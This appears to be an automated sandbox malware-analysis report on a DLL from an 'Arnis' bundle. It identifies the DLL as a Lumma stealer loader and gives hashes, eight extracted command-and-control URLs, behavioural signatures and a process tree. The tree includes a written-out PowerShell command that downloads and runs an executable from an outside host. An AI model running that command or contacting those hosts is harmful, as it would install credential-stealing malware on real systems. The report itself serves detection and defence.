Overview
overview
10Static
static
3Arnis.exe
windows10-2004-x64
10Qt5Gui.dll
windows7-x64
3Qt5Gui.dll
windows10-2004-x64
3Qt5Svg.dll
windows7-x64
3Qt5Svg.dll
windows10-2004-x64
3args.js
windows7-x64
3args.js
windows10-2004-x64
3iviewers.dll
windows7-x64
3iviewers.dll
windows10-2004-x64
10main.js
windows7-x64
3main.js
windows10-2004-x64
3ssleay32.dll
windows7-x64
3ssleay32.dll
windows10-2004-x64
3world_editor.js
windows7-x64
3world_editor.js
windows10-2004-x64
3Analysis
-
max time kernel
93s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
07-01-2025 00:03
Static task
static1
Behavioral task
behavioral1
Sample
Arnis.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
Qt5Gui.dll
Resource
win7-20240903-en
Behavioral task
behavioral3
Sample
Qt5Gui.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral4
Sample
Qt5Svg.dll
Resource
win7-20241010-en
Behavioral task
behavioral5
Sample
Qt5Svg.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral6
Sample
args.js
Resource
win7-20240708-en
Behavioral task
behavioral7
Sample
args.js
Resource
win10v2004-20241007-en
Behavioral task
behavioral8
Sample
iviewers.dll
Resource
win7-20240903-en
Behavioral task
behavioral9
Sample
iviewers.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral10
Sample
main.js
Resource
win7-20240903-en
Behavioral task
behavioral11
Sample
main.js
Resource
win10v2004-20241007-en
Behavioral task
behavioral12
Sample
ssleay32.dll
Resource
win7-20240903-en
Behavioral task
behavioral13
Sample
ssleay32.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral14
Sample
world_editor.js
Resource
win7-20240729-en
Behavioral task
behavioral15
Sample
world_editor.js
Resource
win10v2004-20241007-en
General
-
Target
iviewers.dll
-
Size
8KB
-
MD5
da9b36090cd0f8766f2127bc5c318389
-
SHA1
972f6a885512db3c5ae4330be4e81519d8e7884d
-
SHA256
b6edb1c17bbdafa08c1b97f0e0880f036937d5453c3dc06c7c24e34abe36f828
-
SHA512
702213d3d2955e58dc02468288891d29f69213b75fdb5f9aba27daf618bf1b8a3ff5ad96283945ead868d4f837641ea52273430207080e781221ee2294a728f6
-
SSDEEP
96:UXVV9kybtLHUkbpGDrA791djz3Jn6b7g303PRPFJygFE1H/8R:okybtLHuvG9vjz3J29RTygFE1H/u
Malware Config
Extracted
lumma
https://cloudewahsj.shop/api
https://rabidcowse.shop/api
https://noisycuttej.shop/api
https://tirepublicerj.shop/api
https://framekgirus.shop/api
https://wholersorie.shop/api
https://abruptyopsn.shop/api
https://nearycrepso.shop/api
Signatures
-
Lumma family
-
Blocklisted process makes network request 3 IoCs
flow pid Process 14 2732 powershell.exe 17 2732 powershell.exe 18 2732 powershell.exe -
Downloads MZ/PE file
-
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral9/files/0x000b000000023b86-31.dat net_reactor behavioral9/memory/700-35-0x0000000000980000-0x00000000009E2000-memory.dmp net_reactor -
Executes dropped EXE 2 IoCs
pid Process 700 5x5xxyze.kr2.exe 2640 5x5xxyze.kr2.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 700 set thread context of 2640 700 5x5xxyze.kr2.exe 87 -
pid Process 2732 powershell.exe -
Program crash 1 IoCs
pid pid_target Process 3492 700 WerFault.exe -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5x5xxyze.kr2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5x5xxyze.kr2.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2732 powershell.exe 2732 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2732 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 1080 wrote to memory of 4264 1080 regsvr32.exe 82 PID 1080 wrote to memory of 4264 1080 regsvr32.exe 82 PID 1080 wrote to memory of 4264 1080 regsvr32.exe 82 PID 4264 wrote to memory of 2732 4264 regsvr32.exe 83 PID 4264 wrote to memory of 2732 4264 regsvr32.exe 83 PID 4264 wrote to memory of 2732 4264 regsvr32.exe 83 PID 4264 wrote to memory of 700 4264 regsvr32.exe 85 PID 4264 wrote to memory of 700 4264 regsvr32.exe 85 PID 4264 wrote to memory of 700 4264 regsvr32.exe 85 PID 700 wrote to memory of 2640 700 5x5xxyze.kr2.exe 87 PID 700 wrote to memory of 2640 700 5x5xxyze.kr2.exe 87 PID 700 wrote to memory of 2640 700 5x5xxyze.kr2.exe 87 PID 700 wrote to memory of 2640 700 5x5xxyze.kr2.exe 87 PID 700 wrote to memory of 2640 700 5x5xxyze.kr2.exe 87 PID 700 wrote to memory of 2640 700 5x5xxyze.kr2.exe 87 PID 700 wrote to memory of 2640 700 5x5xxyze.kr2.exe 87 PID 700 wrote to memory of 2640 700 5x5xxyze.kr2.exe 87 PID 700 wrote to memory of 2640 700 5x5xxyze.kr2.exe 87
Processes
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\iviewers.dll1⤵
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\iviewers.dll2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4264 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'https://moolaplace.com/arnireq.exe' -OutFile 'C:\Windows\Temp\5x5xxyze.kr2.exe'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2732
-
-
C:\Windows\Temp\5x5xxyze.kr2.exe"C:\Windows\Temp\5x5xxyze.kr2.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:700 -
C:\Windows\Temp\5x5xxyze.kr2.exe"C:\Windows\Temp\5x5xxyze.kr2.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2640
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 700 -s 7964⤵
- Program crash
PID:3492
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 700 -ip 7001⤵PID:2028
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
358KB
MD5e195a398efc6cf3b170399418eede5dc
SHA1b2a5786515b12d60c8035c8129123eccb9324d12
SHA2567b8b7aa7fa8fc7a79ca28976893b21f9c8760fad2bb0bbffa10f97101431e19b
SHA5125f24fb8836ce26cb8aacac32b1a16e9ae5cd2ab4a11b4aa6b54e38df697d51045cff962193b47d628ab3abdd2057952d8edb96946cf1349890df36774e3c9210